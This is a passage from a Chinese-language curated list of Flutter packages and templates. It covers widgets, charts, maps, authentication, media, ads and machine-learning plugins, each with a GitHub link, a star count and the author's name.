- [Radial Menu](https://github.com/xqwzts/flutter_radial_menu) [401⭐] - 动画径向菜单,由[Victor Choueiri](https://github.com/xqwzts)创建。
- [Tinder Cards](https://github.com/Ivaskuu/tinder_cards) [646⭐] - 类似Tinder的卡片滑动效果,由[Ivascu Adrian](https://github.com/Ivaskuu)创建。
- [Flip Panel](https://github.com/hnvn/flutter_flip_panel) [461⭐] - 带有内置动画的翻转面板,由[HungHD](https://github.com/hnvn)创建。
- [Facebook Reactions](https://github.com/duytq94/facebook-reaction-animation) [261⭐] - Facebook反应小部件,由[Duy Tran](https://github.com/duytq94)创建。
- [Flushbar](https://github.com/AndreHaueisen/flushbar) [818⭐] - 高度可配置的Snackbar,由[Andre Haueisen](https://github.com/AndreHaueisen)创建。
- [Stepper Touch](https://github.com/Rahiche/stepper_touch) [238⭐] - 漂亮动画的侧面值步进器,由[Raouf Rahiche](https://github.com/Rahiche)创建。
- [Typeahead](https://github.com/AbdulRahmanAlHamali/flutter_typeahead) [560⭐] - 用户输入时显示覆盖建议的小部件,由[Abdul Rahman Al Hamali](https://github.com/AbdulRahmanAlHamali)创建。
- [Snaplist](https://github.com/ariedov/flutter_snaplist) [366⭐] - 创建可捕捉的列表视图,由[David Leibovych](https://github.com/ariedov)创建。
- [Pin Code](https://github.com/LiewJunTung/pin_code_text_field) [252⭐] - 用于登录和OTP的动画和可定制的Pin码,由[Liew Jun Tung](https://github.com/liewjuntung)创建。
- [Folding Cell](https://github.com/faob-dev/folding_cell) [430⭐] - 折叠小部件,由[Faob](https://github.com/faob-dev)创建。
- [Liquid Pull To Refresh](https://github.com/aagarwal1012/Liquid-Pull-To-Refresh) [922⭐] - 美观和可定制的刷新指示器,由[Ayush Agarwal](https://github.com/aagarwal1012)创建。
- [Slide Container](https://pub.dev/packages/slide_container) - 以平滑阻尼运动的方式垂直和水平滑动,由[Quentin Le Guennec](https://github.com/quentinleguennec)创建。
- [Direct Select](https://github.com/LanarsInc/direct-select-flutter) - 全屏模态弹出的选择小部件,由[Ivan Yatsouba](https://github.com/iyatsouba)创建。
- [Before After](https://github.com/xsahil03x/before_after) [580⭐] - 美观的滑块,方便展示两张图片之间的差异,由[Sahil Kumar](https://github.com/xsahil03x)创建。
- [Scratcher](https://github.com/vintage/scratcher) [306⭐] - 刮刮卡小部件,临时隐藏用户内容,由[Kamil Rykowski](https://github.com/vintage)创建。
- [Image Sequence Animator](https://github.com/aliyigitbireroglu/flutter-image-sequence-animator) [104⭐] - 一款简单的小部件,用于动画化一组图片,提供完全自定义控制,作为使用GIF文件的替代方案,由[Ali Yigit Bireroglu](https://github.com/aliyigitbireroglu)创建。
- [Beautiful_Popup](https://github.com/jaweii/Flutter_beautiful_popup) [452⭐] - 美化应用弹出窗口,由[jaweii](https://github.com/jaweii)创建。
- [Credit Card Form](https://github.com/Origogi/Flutter-Credit-Card-Input) [317⭐] - 动画信用卡输入表单,由[Origogi](https://github.com/Origogi)创建。
- [Animated Selection Slide](https://github.com/sbilketay/animated_selection_slide) - 通过滑动实现动画化的选择小部件,由[Sezgin Bilgetay](https://github.com/sbilketay)创建。
- [Flutter Tags](https://github.com/Dn-a/flutter_tags) [332⭐] - 带有不同自定义选项的标签小部件,由[Di Natale Antonino](https://github.com/Dn-a)创建。
- [Flutter Neumorphic](https://github.com/Idean/Flutter-Neumorphic) [1329⭐] - 用于Flutter的现成Neumorphic套件,支持🕶️暗黑模式。
- [Dough](https://github.com/HatFeather/flutter_dough) [388⭐] - 创建可压缩用户界面的小部件,由[Josiah Saunders](https://github.com/HatFeather)创建。
- [Card Settings](https://github.com/codegrue/card_settings) [356⭐] - 用于构建设置表单的包,由[codegrue](https://github.com/codegrue)创建。
- [Timelines](https://github.com/chulwoo-park/timelines) [413⭐] - 强大且易于使用的时间轴包,由[Chulwoo Park](https://github.com/chulwoo-park)创建。
- [Timeline Tile](https://github.com/JHBitencourt/timeline_tile) [446⭐] - 用于构建美观和可自定义时间轴的瓷砖小部件,由[Julio Bitencourt](https://github.com/JHBitencourt)提供。
- [Rounded Loading Button](https://github.com/chrisedg87/flutter_rounded_loading_button) [127⭐] - 带有加载指示器的按钮,包括成功和错误动画,由[Chris Edgington](https://twitter.com/ChrisTheEdg)创建。
- [PlutoGrid](https://github.com/bosskmk/pluto_grid) [182⭐] - 可以通过键盘控制的Web和桌面数据表格,由[bosskmk](https://github.com/bosskmk)创建。
#### 粘粘头部
- [Sticky Infinite List](https://github.com/TatsuUkraine/flutter_sticky_infinite_list) [128⭐] - 带有粘性标题的高度可配置的多向无限列表,由[TatsuUkraine](https://github.com/TatsuUkraine)提供。
- [Sticky Header](https://github.com/letsar/flutter_sticky_header) [534⭐] - 带有粘性头部效果的组件,由[Romain Rastel](https://github.com/letsar)提供。
- [Sticky Headers](https://github.com/slightfoot/flutter_sticky_headers) [539⭐] - 可配置的带粘粘头部效果的组件,由 [Simon Lightfoot](http://www.devangels.london/)提供。
#### 抽屉
- [Hidden Drawer Menu](https://github.com/RafaelBarbosatec/hidden_drawer_menu) [164⭐] - 漂亮的抽屉模式菜单功能带有透视动画,由[Rafael Almeida Barbosa](https://github.com/RafaelBarbosatec)提供。
- [Flutter Inner Drawer](https://github.com/Dn-a/flutter_inner_drawer) [211⭐] - 创建内部抽屉(左/右)的简单方法,您可以在其中输入列表菜单,由[Di Natale Antonino](https://github.com/Dn-a)提供。
#### 底栏
- [Fancy Bottom Navigation](https://github.com/tunitowen/fancy_bottom_navigation) [404⭐] - 动画底部导航,由[Tony Owen](https://github.com/tunitowen)提供。
- [Circular Bottom Navigation](https://github.com/imaNNeoFighT/circular_bottom_navigation) [314⭐] - 漂亮的动画底部导航栏,由[Iman Khoshabi](https://github.com/imaNNeoFighT)提供。
- [Bottom Navy Bar](https://github.com/pedromassango/bottom_navy_bar) [550⭐] - 美丽多彩的动画底部导航栏,由[Pedro Massango](https://github.com/pedromassango)提供。
- [Titled Navigation Bar](https://github.com/pedromassango/titled_navigation_bar) [184⭐] - 动画底部导航栏,可在图标和标题之间切换,由[Pedro Massango](http://github.com/pedromassango)提供。
#### 底部表单
- [Rubber Bottom Sheet](https://github.com/mcrovero/rubber) [298⭐] - 弹性材料设计的底部表单,由[Mattia Crovero](https://github.com/mcrovero)提供。
- [Modal Bottom Sheet](https://github.com/jamesblasco/modal_bottom_sheet) [536⭐] - 带材料设计,Cupertino iOS 13或自定义外观的模态底部表单,由[Jaime Blasco](https://github.com/jamesblasco)提供。
- [Google Nav Bar](https://github.com/sooxt98/google_nav_bar) [409⭐] - 一款现代化的 Google 风格导航栏,由 [Sooxt98](http://github.com/sooxt98) 创建。
#### 滑块
- [RangeSlider](https://github.com/boeledi/RangeSlider) [237⭐] - 滑动选择范围的Flutter组件,由[Didier Boelens](https://www.didierboelens.com)提供。
- [Fluid Slider](https://github.com/rvamsikrishna/flutter_fluid_slider) [211⭐] - 具有最小设计和流体状动画的滑块,由 [Vamsi Krishna](https://github.com/rvamsikrishna)提供。
- [Flutter Xlider](https://github.com/Ali-Azmoud/flutter_xlider) [216⭐] - 具有RTL支持的水平和垂直材料设计滑块和范围滑块,由[Ali-Azmoud](https://github.com/Ali-Azmoud)提供。
#### UI 助手
- [可重新排序](https://github.com/hanshengchiu/reorderables) [442⭐] - 通过拖放实现表格、行、列、Wrap(Grid)和SliverList元素的重新排序,由[Hansheng Chiu](https://github.com/hanshengchiu)开发。
- [液体下拉刷新](https://github.com/aagarwal1012/Liquid-Pull-To-Refresh) [922⭐] - 一个美观且可自定义的刷新指示器,由[Ayush Agarwal](https://github.com/aagarwal1012/)开发。
- [无限列表视图](https://github.com/fluttercommunity/flutter_infinite_listview) [206⭐] - 可在两个方向上进行无限滚动的列表视图,由[Simon Lightfoot](https://github.com/slightfoot)开发。
- [离线](https://github.com/jogboms/flutter_offline) [742⭐] - 用于处理离线/在线连接的整洁工具,由[Jeremiah Ogbomo](https://twitter.com/jogboms)开发。
- [滚动到索引](https://github.com/quire-io/scroll-to-index) [332⭐] - 为SliverList/ListView滚动到指定索引的子元素,由[Jerry Chen](https://github.com/jerrywell/)开发。
- [可见区域通知列表](https://github.com/rvamsikrishna/inview_notifier_list) - 当小部件在提供的区域内可见时,通知的列表视图,由[Vamsi Krishna](https://github.com/rvamsikrishna)开发。
- [展示视图](https://github.com/simformsolutions/flutter_showcaseview) [687⭐] - 在iOS和Android上展示应用程序功能的方式,由[Simform](https://github.com/simformsolutions)开发。
#### 材料设计
- [Unicorn Speed Dial](https://github.com/tiagojencmartins/unicornspeeddial) [229⭐] - 带有快速拨号Flutter浮动动作按钮 ,由 [Tiago Martins](https://github.com/tiagojencmartins)提供。
- [Slidable](https://github.com/letsar/flutter_slidable) [1473⭐] - 带有左右滑动操作的可滑动列表项组件,由 [Romain Rastel](https://github.com/letsar)提供。
#### Cupertino 设计
- [Peek & Pop](https://github.com/aliyigitbireroglu/flutter-peek-and-pop) [138⭐] - 基于iOS功能的Peek&Pop实现,由[Ali Yigit Bireroglu](https://github.com/aliyigitbireroglu)提供。
#### 效果
- [磨砂玻璃](http://stackoverflow.com/questions/43550853/how-do-i-do-the-frosted-glass-effect-in-flutter) - 由[Collin Jackson](http://www.collinjackson.com)创建的渲染效果。
- [视差效果](https://github.com/FlutterRocks/page-transformer) [735⭐] - 由[Iiro Krankka](https://github.com/roughike)创建的ViewPager。
- [闪光效果](https://github.com/hnvn/flutter_shimmer) [1387⭐] - 在内容加载时显示闪光效果,由[HungHD](https://github.com/hnvn)创建。
- [波浪效果](https://github.com/i-protoss/wave) [742⭐] - 显示带有自定义颜色、持续时间、浮动和模糊效果的波浪效果,由[RockerFlower](https://github.com/RockerFlower)创建。
- [液体滑动](https://github.com/iamSahdeep/liquid_swipe_flutter) - 使用液体滑动切换堆叠的容器,由[Sahdeep Singh](https://github.com/iamSahdeep)创建。
- [图片滤镜](https://github.com/skkallayath/photofilters) [297⭐] - 对图像应用滤镜,由[Sharafudheen KK](https://github.com/skkallayath)创建。
- [闪耀效果](https://github.com/JonathanMonga/flutter_shine.dart) [137⭐] - 通过动态光源位置创建漂亮的阴影效果,由[Jonathan Monga](https://github.com/JonathanMonga/)创建。
- [Clay Containers](https://github.com/mcaubrey/clay_containers) [369⭐] - 用于创建自定义设计的Neumorphic小部件基础,由[Michael Charles](https://github.com/mcaubrey)创建。
#### 日历
- [日历小部件](https://github.com/pinkfish/flutter_calendar) [162⭐] - 由 [David Bennett](https://github.com/pinkfish) 制作的日历小部件。
- [日历轮播小部件](https://github.com/dooboolab/flutter_calendar_carousel) <!-- stargazers:dooboolab/flutter_calendar_carousel--> - 由 [dooboolab](https://github.com/dooboolab/flutter_calendar_carousel) 制作的日历轮播小部件。
- [表格日历](https://github.com/aleksanderwozniak/table_calendar) [1167⭐] - 由 [Aleksander Woźniak](https://github.com/aleksanderwozniak) 制作的整洁组织的表格日历,具有垂直自动调整大小的功能。
- [时间计划表](https://github.com/Jamalianpour/time_planner) [66⭐] - 由 [Mohammad Jamalianpour](https://github.com/Jamalianpour) 制作的美观、易于使用和可定制的时间计划表,适用于Flutter移动、桌面和Web端。
#### 登录
- [登录动画](https://github.com/GeekyAnts/flutter-login-home-animation) [1044⭐] - 由 [Ruchika Gupta](https://github.com/geekruchika) 制作的从登录到主页的平滑动画。
- [Flutter登录](https://github.com/NearHuscarl/flutter_login) - 具有平滑动画效果的登录小部件,从开始到结束都很流畅,由 [NearHuscarl](https://github.com/NearHuscarl) 制作。
#### 基于后端驱动
- [动态小部件](https://github.com/dengyin2000/dynamic_widget) [1100⭐] - 使用JSON构建动态用户界面,JSON格式与Flutter小部件代码非常相似,由 [Denny Deng](https://github.com/dengyin2000) 制作。
### 图片
- [轮播滑块](https://github.com/serenader2014/flutter_carousel_slider) [1178⭐] - 由 [serenader](https://github.com/serenader2014) 制作的轮播滑块小部件,支持无限滚动和自定义子部件。
- [视差图片](https://github.com/pulyaevskiy/parallax-image) [238⭐] - 由 [Anatoly Pulyaevskiy](https://github.com/pulyaevskiy) 制作的视差图片效果。
- [照片查看](https://github.com/renancaraujo/photo_view) [1478⭐] - 可缩放的图片查看器,带有加载占位符,由 [Renan C. Araújo](https://github.com/renancaraujo) 制作。
- [SVG](https://github.com/dnfield/flutter_svg) [1270⭐] - SVG解析、渲染和小部件库,由 [Dan Field](https://github.com/dnfield) 制作。
- [图片裁剪](https://github.com/hnvn/flutter_image_cropper) [814⭐] - 支持比例、旋转和缩放的图片裁剪,由 [HungHD](https://github.com/hnvn) 制作。
- [缓存网络图片](https://github.com/renefloor/flutter_cached_network_image) [1911⭐] - 显示来自互联网的图片并将它们保存在缓存目录中。
- [Lottie](https://github.com/xvrh/lottie-flutter) [665⭐] - 使用airbnb流行的[After Effects动画库](https://airbnb.design/lottie/),由 [xvrh](https://github.com/xvrh/lottie-flutter) 制作。
- [位图](https://github.com/renancaraujo/bitmap) [128⭐] - 使用Dart FFI进行位图操作(如对比度和曝光),由 [Renan C. Araújo](https://github.com/renancaraujo) 制作。
- [裁剪](https://github.com/xclud/flutter_crop) [171⭐] - 在Android、iOS、Web和桌面上裁剪任何小部件/图片,由 [Mahdi K. Fard](https://github.com/xclud/) 制作。
#### 图片选择器
- [图片选择器](https://github.com/flutter/plugins/tree/master/packages/image_picker) - 图片选择,由 [Collin Jackson](http://www.collinjackson.com) 制作。
- [微信资产选择器](https://github.com/fluttercandies/flutter_wechat_assets_picker) [811⭐] - 微信风格的资产选择器,支持多个资产,由 [Alex Li](https://github.com/AlexV525) 制作。
### 地图
- [Google Map View](https://github.com/apptreesoftware/flutter_google_map_view) [404⭐] - Google地图插件,由 [AppTree Software](https://www.linkedin.com/company/apptree-software/)提供。
- [GeoCoder](https://github.com/aloisdeniel/flutter_geocoder) [122⭐] - 提供正向和反向地理编码库,由 [Aloïs Deniel](https://aloisdeniel.github.com)提供。
- [Map](https://github.com/apptreesoftware/flutter_map) [416⭐] - 基于[Leaflet](http://leafletjs.com/)的,可定制的地图解决方案,由 [AppTree Software](https://github.com/apptreesoftware)提供。
- [Mapbox GL](https://github.com/mapbox/flutter-mapbox-gl) [239⭐] - 交互式,可定制的矢量地图。
- [AMap](https://github.com/fluttify-project/amap_map_fluttify) [421⭐] - 高德地图插件,由[fluttify-project](https://github.com/fluttify-project)。
### 图表
- [环形图](https://github.com/xqwzts/flutter_circular_chart) [355⭐] - 由 [Victor Choueiri](https://github.com/xqwzts) 制作的动画径向和饼图。
- [Sparkline](https://github.com/xqwzts/flutter_sparkline) [245⭐] - 由 [Victor Choueiri](https://github.com/xqwzts) 制作的Sparkline图表。
- [Charts](https://github.com/google/charts) [2505⭐] - Google Charts团队制作。
- [蜡烛图](https://github.com/trentpiercy/flutter-candlesticks) [358⭐] - OHLC和交易量图表,由 [Trent Piercy](https://github.com/trentpiercy) 制作。
- [FCharts](https://github.com/thekeenant/fcharts) [321⭐] - 美观、响应式、动画效果的图表,由 [Keenan Thompson](https://keenant.com) 制作。
- [FL Chart](https://github.com/imaNNeoFighT/fl_chart) [3846⭐] - 在Flutter中绘制出色的图表,由 [Iman Khoshabi](http://www.ikhoshabi.com) 制作。
- [贝塞尔图表](https://github.com/aeyrium/bezier-chart) [401⭐] - Flutter中美观的贝塞尔线图小部件,具有高度交互和可配置性,由 [Diego Velasquez](https://twitter.com/diegoveloper) 制作。
- [Echarts](https://github.com/entronad/flutter_echarts) [533⭐] - 大量高级响应式图表集合,由 [LIN Chen](https://github.com/entronad) 制作。
- [Graphic](https://github.com/entronad/graphic) [383⭐] - 基于图形语法的数据可视化库,由 [LIN Chen](https://github.com/entronad) 制作。
### 导航
- [Fluro](https://github.com/goposse/fluro) [3362⭐] - Flutter中最亮、最时尚、最酷的路由器,具有导航、通配符、查询和过渡效果,由 [Posse](http://goposse.com) 制作。
- [PageView Indicator](https://github.com/leocavalcante/page_view_indicator) [132⭐] - 为PageView构建页面指示器,由 [Leo Cavalcante](https://github.com/leocavalcante) 制作。
- [深层链接导航](https://github.com/Dennis-Krasnov/Flutter-Deep-Link-Navigation) [53⭐] - 在Flutter中实现完整的深层链接导航的优雅抽象,由 [Dennis Krasnov](https://denniskrasnov.com) 制作。
- [Get](https://github.com/jonataslaw/get) [1219⭐] - 一个应用于Flutter的高性能状态管理,智能依赖性注入和路由管理的插件,由[Jonny Borges](https://github.com/jonataslaw)。
### 验证
- [Local Auth](https://github.com/flutter/plugins/tree/master/packages/local_auth) - 支持Touch ID, 指纹,锁屏识别验证的Flutter库。
- [Login](https://github.com/AppleEducate/flutter_login) [545⭐] - 自持Face ID, Touch ID, 和 指纹识别验证的Flutter库,由[Rody Davis](http://appleeducate.com)提供。
- [Google Sign-In](https://github.com/flutter/plugins/tree/master/packages/google_sign_in) - Google 登录SDK.
- [Firebase Auth](https://github.com/flutter/plugins/tree/master/packages/firebase_auth) - Firebase 登录SDK.
- [Facebook Login](https://github.com/roughike/flutter_facebook_login) [374⭐] - 使用原生Android和iOS的Facebook登录SDK进行身份验证 [Iiro Krankka](https://github.com/roughike)。
- [Apple Sign-In](https://github.com/tomgilder/flutter_apple_sign_in) [145⭐] - 苹果登录插件,由[Tom Gilder](https://github.com/tomgilder)。
- [OAuth](https://github.com/hitherejoe/FlutterOAuth) [74⭐] - Buffer, Strava, Unsplash, Github 登录验证,由 [Joe Birch](http://www.hitherejoe.com)提供。
- [Instagram](https://hackernoon.com/instagram-authentication-with-flutter-df6424d2d56c) - Instagram 登录验证由 [Wilfried Mbouenda Mbogne](http://developer-journey.com/)提供。
- [Firebase Phone Auth](https://medium.com/@gildaswise/flutter-adding-sign-in-with-google-and-phone-authentication-to-your-app-69f681518f9b) [266👏] - 电话号码通过短信身份验证,由 [Gildásio Filho](https://github.com/gildaswise)提供。
- [SimpleAuth](https://github.com/Clancey/simple_auth) [56⭐] - Azure Active Directory, Amazon, Dropbox, Facebook, Github, Google, Instagram, Linked In, Microsoft Live Connect, Github的登录验证,由 [James Clancey](https://github.com/Clancey)提供。
- [Flutter AppAuth](https://github.com/MaikuB/flutter_appauth) [120⭐] - 提供围绕AppAuth iOS和Android SDK的包装的插件,由[Michael Bui](https://github.com/MaikuB)提供。
### 文字和富文本
- [Markdown](https://github.com/flutter/flutter_markdown) null - Flutter的Markdown渲染器。它支持原始格式,但不支持内联HTML。
- [Masked Text](https://github.com/benhurott/flutter-masked-text) [244⭐] - 由 [Ben-hur Santos Ott](https://github.com/benhurott) 制作的带有自定义和货币格式的蒙版文本。
- [Zefyr](https://github.com/memspace/zefyr) [2016⭐] - 由 [Memspace](https://github.com/memspace/zefyr) 制作的柔和且温和的富文本编辑器。
- [AutoSizeText](https://github.com/leisim/auto_size_text) [1496⭐] - 自动调整文本大小,使其完美适应边界,由 [Simon Leier](https://github.com/leisim) 制作。
- [Parsed Text](https://github.com/fayeed/flutter_parsed_text) [190⭐] - 基于内容识别的交互式文本,还支持正则表达式,由 [Fayeed Pawaskar](https://github.com/fayeed/) 制作。
- [TeX](https://github.com/shah-xad/flutter_tex) [186⭐] - 使用完整的HTML和JavaScript支持来渲染数学方程式,由 [Shahzad Akram](https://github.com/shah-xad) 制作。
- [Code Field](https://github.com/BertrandBev/code_field) - 可定制的代码字段小部件,支持语法高亮,由 [Bertrand Bevillard](https://github.com/BertrandBev) 制作。
### 表单
- [Form Builder](https://github.com/danvick/flutter_form_builder) [935⭐] - 简化构建表单、验证字段、对变化做出反应和收集最终用户输入的框架,由 [Danvick Miller](https://github.com/danvick) 制作。
- [Reactive Forms](https://github.com/joanpablo/reactive_forms) [233⭐] - 基于模型驱动的方法处理表单输入和验证,受到 Angular 的 Reactive Forms 的启发。
### 分析
- [Usage](https://github.com/dart-lang/usage) [123⭐] - 用于命令行、Web 和 Flutter 应用程序的 Google Analytics 封装。
- [Firebase Analytics](https://github.com/FirebaseExtended/flutterfire/tree/master/packages/firebase_analytics) - 连接到 Firebase Analytics API。
- [Pure Mixpanel](https://github.com/seenickcode/pure_mixpanel) [21⭐] - 用于流行的 [Mixpanel.com](https://mixpanel.com) 的分析工具,由 [Nick Manning](https://twitter.com/seenickcode) 制作。
### 国际化
- [GenLang](https://github.com/KingWu/gen_lang) [88⭐] - 国际化代码生成器,由 [King Wu](https://github.com/KingWu) 制作。
- [Flutter Translate](https://github.com/bratan/flutter_translate) [279⭐] - 国际化(i18n)库,由 [Florin Bratan](http://bratan.me) 制作。
- [attranslate](https://github.com/fkirc/attranslate) - 通过 [fkirc](https://github.com/fkirc) 制作的自动化翻译 ARB 或 JSON 文件工具。
### 样式
- [Flutterial](https://github.com/rxlabz/flutterial) [1437⭐] - Flutter 材料主题浏览器,由 [Erick Ghaumez](https://twitter.com/rxlabz) 制作。
- [Pigment](https://github.com/bregydoc/pigment) [184⭐] - 在 Flutter 中使用颜色的简单但实用的包。
### 媒体
#### 音频
- [Flutter Audio Recorder](https://github.com/shadow-app/flutter_audio_recorder) - 提供完整的录音控制和访问录音详细信息,如电平测量,由 [Wenyan Li](https://github.com/nikli2009) 制作。
- [Audio Recorder](https://github.com/ZaraclaJ/audio_recorder) [169⭐] - 录制音频并将其存储在本地,由 [Jordan Alcaraz](https://twitter.com/jordanalcrz) 制作。
- [Flutter Sound](https://github.com/dooboolab/flutter_sound) [666⭐] - 一手掌握的 Flutter 音频录制和播放器,由 [dooboolab](https://github.com/dooboolab) 制作。
- [AssetsAudioPlayer](https://github.com/florent37/Flutter-AssetsAudioPlayer) [567⭐] - 同时播放来自资源/网络/文件的音频,并显示通知 [android / ios / web / macos]。
- [Audio Service](https://pub.dev/packages/audio_service) - 系统后台音频支持,由 [Ryan Heise](https://github.com/ryanheise) 制作。 [教程](https://suragch.medium.com/background-audio-in-flutter-with-audio-service-and-just-audio-3cce17b4a7d?sk=0837a1b1773e27a4f879ff3072e90305) 由 [Suragch](https://twitter.com/Suragch1) 提供。
#### 视频
- [WebRTC](https://github.com/cloudwebrtc/flutter-webrtc) [2747⭐] - iOS/Android 的 WebRTC 插件,由 [CloudWebRtc](https://github.com/cloudwebrtc) 制作。
- [Chewie](https://github.com/brianegan/chewie) [1353⭐] - 提供对视频播放的低级访问,由 [Brian Egan](https://github.com/brianegan) 制作。
- [Video Trimmer](https://github.com/sbis04/video_trimmer) [276⭐] - 可视化和修剪视频,由 [Souvik Biswas](https://github.com/sbis04) 制作。
- [CamerAwesome](https://github.com/Apparence-io/camera_awesome) [295⭐] - 社区相机插件改版,由 [Apparence.io studio](https://apparence.io) 制作。
#### 语音
- [Speech Recognition](https://github.com/rxlabz/speech_recognition) [323⭐] - 语音转文本,由 [Erick Ghaumez](https://twitter.com/rxlabz) 制作。
- [OK Google](https://marcinszalek.pl/flutter/ok-google-flutter/) - 集成 Google 助手,由 [Marcin Szalek](https://marcinszalek.pl/) 制作。
### 存储
- [Firebase Storage](https://github.com/flutter/plugins/tree/master/packages/firebase_storage) - Firebase作为数据存储的插件。
- [Secure Storage](https://github.com/mogol/flutter_secure_storage) [490⭐] - 提供钥匙串和密钥库存储,由 [German Saprykin](https://github.com/mogol)提供。
#### 首选项
- [Streaming Shared Preferences](https://github.com/roughike/streaming_shared_preferences) - 基于流的键值存储,通过流实现共享首选项,由 [Iiro Krankka](https://github.com/roughike) 制作。
### 赚钱
- [Admob](https://pub.dev/packages/admob) - 支持 iOS 和 Android 的插页式广告,由 Brett Nesbitt 制作。
- [Firebase AdMob](https://github.com/FirebaseExtended/flutterfire/tree/master/packages/firebase_admob) - 使用 Firebase 进行广告集成。
- [Inapp Purchase](https://github.com/dooboolab/flutter_inapp_purchase) [464⭐] - 从 [react-native-iap](https://github.com/dooboolab/react-native-iap) 派生的“应用内购买”功能集合,由 [dooboolab](https://github.com/dooboolab) 制作。
- [Admob Flutter](https://github.com/kmcgill88/admob_flutter) - 使用原生平台视图显示横幅广告的 Admob 插件,由 [Youssef Kababe](https://github.com/YoussefKababe) 和 [Kevin McGill](https://github.com/kmcgill88) 制作。
- [Facebook Audience Network](https://github.com/dreamsoftin/facebook_audience_network) - 显示横幅广告、插页式广告、流式视频广告、激励视频广告和原生广告的 Facebook Audience Network 广告插件,由 [Dreamsoft Innovations](https://github.com/dreamsoftin) 制作。
- [Square In-App Payments SDK](https://github.com/square/in-app-payments-flutter-plugin) [283⭐] - 在应用中嵌入卡片输入表单以生成顾客提供的卡片信息或数字钱包的 Nonce,以进行支付,由 [Square](https://github.com/orgs/square) 制作。
## 模板
- [电影详情](https://github.com/FlutterRocks/movie-details-ui) [372⭐] - 由 [Iiro Krankka](https://github.com/roughike) 制作的电影详情页面。
- [Mates](https://github.com/CodemateLtd/FlutterMates) [482⭐] - 如何从 randomuser.me API 加载个人资料和一个漂亮的个人资料详情页面,由 [Iiro Krankka](https://github.com/roughike) 制作。
- [天气应用](https://github.com/alessandroaime/Weather) [141⭐] - 使用 Canvas 和动画的天气应用,由 [Alessandro Aime](https://github.com/alessandroaime) 制作。
- [TodoMVC](https://github.com/brianegan/flutter_architecture_samples) [7528⭐] - 包含不同风格(Vanilla、Redux、built_redux)的 TODO 应用程序,由 [Brian Egan](https://github.com/brianegan) 制作。
- [餐厅菜单](https://github.com/braulio94/menu_flutter) [553⭐] - 餐厅菜单,由 [Braulio Cassule](https://github.com/braulio94) 制作。
- [UI 挑战](https://github.com/tomialagbe/flutter_ui_challenges) [1272⭐] - 个人资料、旅行、美食应用,由 [Tomi Alagbe](https://github.com/tomialagbe) 制作。
- [Cupertino 设置](https://github.com/matthinc/flutter_cupertino_settings) [219⭐] - iOS 设置,由 [Matthias Rupp](https://github.com/matthinc) 制作。
- [音乐播放器](https://github.com/thosakwe/flutter_music_player) [205⭐] - 音乐播放器组件,由 [Tobe O](https://thosakwe.com/) 制作。
- [仪表盘](https://github.com/Ivaskuu/dashboard) [814⭐] - 仪表盘和商店项目,由 [Ivascu Adrian](https://github.com/Ivaskuu) 制作。
- [Todo](https://github.com/littlemarc2011/FlutterTodo) [519⭐] - 来自 Dribble 的 TODO 模板,由 [Marc L](https://www.marc-little.com/) 制作。
- [卡片滑动动画](https://github.com/geekruchika/FlutterCardSwipe) [462⭐] - 卡片滑动模板,由 [Ruchika Gupta](https://github.com/geekruchika) 制作。
- [UI 工具包](https://github.com/iampawan/Flutter-UI-Kit) [5707⭐] - 一套有用的 UI 工具包,由 [Pawan Kumar](https://github.com/iampawan) 制作。
- [图书](https://github.com/putraxor/flutter-book-app) [300⭐] - 由 [Ardiansyah Putra](https://github.com/putraxor) 制作的书架应用。
- [漂亮的登录界面](https://github.com/huextrat/TheGorgeousLogin) [1497⭐] - 设计优美且流畅的登录模板,由 [Hugo Extrat](https://github.com/huextrat) 制作。
- [Liquid Pay 支付应用](https://github.com/longhoang2984/flutter_payment_app_ui) [251⭐] - 由 [Long Hoang](https://github.com/longhoang2984) 制作的 Liquid Pay 应用概念。
- [绘图应用](https://github.com/SnakeyHips/drawapp) [208⭐] - 示例绘图应用,展示如何允许用户在画布上绘图,并提供颜色选择器和画笔粗细调节器,由 [Jake Gough](https://github.com/SnakeyHips) 制作。
- [入门套件](https://github.com/KingWu/flutter_starter_kit) [596⭐] - App Store 实现,用于学习 Bloc、RxDart、Sqflite、Fluro 和 Dio,由 [King Wu](https://github.com/KingWu) 制作。
- [Feather](https://github.com/jhomlala/feather) [472⭐] - 美观的天气应用程序,包含 RxDart、Dio、BLoC、i18n、单元测试和小部件测试,由 [Jakub Homlala](https://github.com/jhomlala) 制作。
- [克隆 UI 挑战](https://github.com/javico2609/flutter-challenges) [1280⭐] - 一系列有用的 UI 克隆,由 [Javier González](https://github.com/javico2609) 制作。
- [FlutterFoodybite](https://github.com/JideGuru/FlutterFoodybite) [1113⭐] - 优美的美食应用 UI 模板,由 [JideGuru](https://github.com/JideGuru) 制作。
- [Flutter 示例](https://github.com/diegoveloper/flutter-samples) [2464⭐] - 一系列优秀的 Flutter 示例,由 [Diego Velásquez](https://github.com/diegoveloper) 制作。
- [ActingWeb First_App](https://github.com/gregertw/actingweb_firstapp) [285⭐] - 初学者应用程序,包含用于团队开发的生产级应用程序的基本元素,由 [Greger Wedel](https://github.com/gregertw) 制作。
- [智能洗衣机](https://github.com/pawlik92/flutter_whirlpool) [590⭐] - 由 [Tomasz Pawlikowski](https://github.com/pawlik92) 制作的智能洗衣机 UI 挑战应用,采用 Box2D 物理引擎。
- [美观的时间轴](https://github.com/JHBitencourt/beautiful_timelines) [186⭐] - 一组美观的时间轴,由 [Julio Bitencourt](https://github.com/JHBitencourt) 制作。
### Clone
- [GitTouch](https://github.com/pd4d10/git-touch) [979⭐] - GitHub,GitLab,Bitbucket和Gitea的开源移动客户端,由[Rongjian Zhang](https://github.com/pd4d10)提供。
### 机器学习
- [MLKit](https://github.com/azihsoyn/flutter_mlkit) [329⭐] - Firebase 机器学习套件,由[Naoya Yoshizawa](https://github.com/azihsoyn)。
- [m2gen](https://github.com/BayesWitnesses/m2cgen) [1667⭐] - CLI工具可将ML模型转换为本地Dart代码,由[BayesWitnesses](https://github.com/BayesWitnesses)。
### 视觉识别
- [ML Vision Camera Stream](https://github.com/santetis/flutter_camera_ml_vision) [218⭐] - 由 [Aumard Jimmy](https://github.com/jaumard) 和 [Santetis](https://github.com/santetis) 制作的 ML Vision 相机流应用,可进行 QR 码、人脸等识别。
- [Google Mobile Vision](https://github.com/edufolly/flutter_mobile_vision) [433⭐] - 由 [Eduardo Folly](https://github.com/edufolly) 制作的 Google Mobile Vision 库。
#### Augmented Reality
- [ARKit Plugin](https://github.com/olexale/arkit_flutter_plugin) [470⭐] - ARKit包装器-苹果的iOS增强现实平台,由[Olexandr Leuschenko](https://github.com/olexale)。
